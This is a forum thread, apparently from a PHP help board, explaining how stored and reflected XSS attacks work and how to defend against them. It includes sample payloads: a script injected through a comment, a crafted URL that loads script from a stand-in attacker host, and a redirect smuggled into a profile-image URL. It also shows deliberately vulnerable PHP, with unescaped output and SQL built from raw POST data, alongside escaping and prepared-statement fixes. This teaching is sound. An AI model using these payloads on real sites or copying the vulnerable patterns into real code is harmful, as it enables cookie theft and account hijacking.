Understanding XSS attacks ...


pepelepew1962


Hello:

 

I am really trying to understand XSS attacks and can't seem to wrap my head around it; I would rather seem like a fool than program like one with holes in it. My problem is understanding how an attack occurs. Let's say Mary logs into the system and creates a record in the table via an HTML form. I have PHP filters and validation for the data before it actually goes into the MySQL table. My question is, how does John attack my website? Or more importantly, how does he actually change files? If he were to have a login and gains access because it doesn't take much to register, how? Is it a matter of the filter being bad and his XSS script is in a record, and when someone opens/views that record (field) the script is launched? I have read lots on how the JavaScript, for example, is placed in the URL or form fields, but nothing explains whether the information is saved and launched via the record stored in the database.


So let's say you have a form that saves user input to a database and then displays it somewhere else on the website. Let's say it's a comment form.

 

So John comes along and types this as his comment:

<script>alert("I'm John");</script>

 

Now every user that views that comment will have an alert box pop up. One of the biggies here is being able to steal or alter cookies. John could potentially steal your login cookie and become you. He could also do all kinds of malicious things on the page to try to infect people with malware.

 

As for protecting against it, you have two options. You can either convert HTML characters to entities so that the HTML is not parsed, which (should) protect against XSS. The other option, say if you want to actually display user-submitted HTML, is to filter out anything that can be used maliciously as XSS. Doing that is pretty complicated so if that's the route you want to take, I would recommend HTML Purifier.


Note that these types of protections need to be applied anywhere you have any type of user generated content, whether it comes from data put into the DB or just from a URL parameter. Say for instance you have an email form for sending an inquiry about a product, and you pass the product name in the URL to, say, pre-fill the subject of the email form:

 

www.example.com/inquiry.php?prod=Super+Delux+Widget

then in your code:

<input type="text" name="subject" value="Inquiry about <?php echo $_GET['prod']; ?>">

 

A malicious user could use that as an attack vector to inject code.  For instance, a URL such as:

www.example.com/inquiry.php?prod=%22%3E%3Cscript+src%3D%22http%3A%2F%2Fhackersite.com%2Fscript.js%22%3E%3C%2Fscript%3E

 

would cause the page to load and execute the JS located at http://hackersite.com/script.js.  That script could do any number of things such as steal the cookies, redirect them to a phishing site, re-write your site, etc.  For that type of attack, they don't even have to sign up or register or anything on your site, just get users to follow that special URL, say via a spam email or other site promising a discount or something.

 

edit:

I feel that I should clarify that "user generated content" does not just mean something that a user types in on a form on your site.  It includes any data you get from an uncontrollable source, such as any url, post, or cookie variable. 

 

In the example above, the intent is that on each of your individual product pages, you would set the prod parameter to that product's name. It's not intended that the user ever enter it manually or change it from what you have set. However, since it is just a URL variable, it is quite easy and possible for someone to change it; that is why you need to take the precautions regardless.

 

 

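As an added example (not code from any of the replies above), here is the entity-escaping approach the two replies recommend, applied to both contexts they describe: the stored comment shown in the page body, and the `prod` parameter echoed into the subject attribute. The inputs are constructed from the payloads quoted in this thread.

```php
<?php
// Added example, not code from the thread: escape on output in the two
// contexts described above, a stored comment shown in the page body and a
// URL parameter echoed into an HTML attribute value.

// htmlspecialchars turns < > & " ' into entities. ENT_QUOTES is what makes
// the attribute case safe; always pass the charset explicitly.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs standing in for John's comment and the crafted ?prod= value.
$comment = '<script>alert("I\'m John");</script>';
$prod    = '"><script src="http://hackersite.com/script.js"></script>';

// Vulnerable: echoed raw, so the browser runs the comment as a script.
$unsafeComment = '<p>' . $comment . '</p>';
// Hardened: the same text is rendered as visible characters, not markup.
$safeComment = '<p>' . e($comment) . '</p>';

// Vulnerable: the leading " closes value="..." and the rest becomes new markup.
$unsafeInput = '<input type="text" name="subject" value="Inquiry about ' . $prod . '">';
// Hardened: every " becomes &quot;, so the value attribute cannot be closed early.
$safeInput = '<input type="text" name="subject" value="Inquiry about ' . e($prod) . '">';

// Self-check: no tag survives in the body case, and in the attribute case the
// value is still one quoted string (the same pattern fails on the unsafe one).
$oneAttr = '/^<input type="text" name="subject" value="[^"]*">$/';
if (strpos($safeComment, '<script') !== false) {
    throw new RuntimeException('comment was not escaped');
}
if (preg_match($oneAttr, $safeInput) !== 1 || preg_match($oneAttr, $unsafeInput) !== 0) {
    throw new RuntimeException('attribute escaping check failed');
}

echo $safeComment, "\n", $safeInput, "\n";
```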

A classic one is profile images. Let's say crappy-website.com has user profiles, and you can post a URL to a profile image for your profile.

 

 

// Saving the profile form (the vulnerable code: the URL is neither validated
// nor escaped before it is spliced into the SQL string)
$image = $_POST['image_url'];
mysql_query("UPDATE users SET image_url = '$image' WHERE user_id = ". $_SESSION['id'] ." LIMIT 1");

// The form field the user submits
<input type="text" name="image_url" >

// Later, when the profile is displayed: the stored URL is echoed raw into the src attribute
echo '<img src="'. $image .'" >';

 

 

Now, let's say I input the image URL as:

http://myimage.com.image.jpg\' <script type="text/javascript">window.location.href=\'http://nicking-your-traffic.com\';</script>

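An added example (not the poster's code) showing the same profile-image flow with input validation, a bound SQL parameter and output escaping. The `users` table layout and the user id 7 are assumptions, and SQLite in memory stands in for MySQL only so the example runs stand-alone.

```php
<?php
// Added example, not code from the thread: the profile-image case rewritten to
// validate input, bind SQL parameters and escape output. Assumes a users table
// with (user_id, image_url); SQLite in memory replaces MySQL so it runs alone.

// Accept only an absolute http(s) URL. Quotes, spaces and tags fail
// FILTER_VALIDATE_URL; the scheme check also rejects javascript: and data:.
function validateImageUrl(string $url): ?string
{
    $url = trim($url);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, image_url TEXT)');
$db->exec("INSERT INTO users (user_id, image_url) VALUES (7, '')");
$userId = 7; // stands in for $_SESSION['id']

// Constructed inputs: the payload from the post above, then a legitimate URL.
$attempts = [
    "http://myimage.com.image.jpg' <script>window.location.href='http://nicking-your-traffic.com';</script>",
    'http://myimage.com/image.jpg',
];

foreach ($attempts as $input) {
    $clean = validateImageUrl($input);
    if ($clean === null) {
        echo 'rejected: ', e($input), "\n";
        continue;
    }
    // Bound parameter: the value never becomes part of the SQL text.
    $stmt = $db->prepare('UPDATE users SET image_url = :url WHERE user_id = :id');
    $stmt->execute([':url' => $clean, ':id' => $userId]);
}

// On display, escape again: validation at input time is not a substitute.
$stmt = $db->prepare('SELECT image_url FROM users WHERE user_id = :id');
$stmt->execute([':id' => $userId]);
echo '<img src="' . e((string) $stmt->fetchColumn()) . '">', "\n";
```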
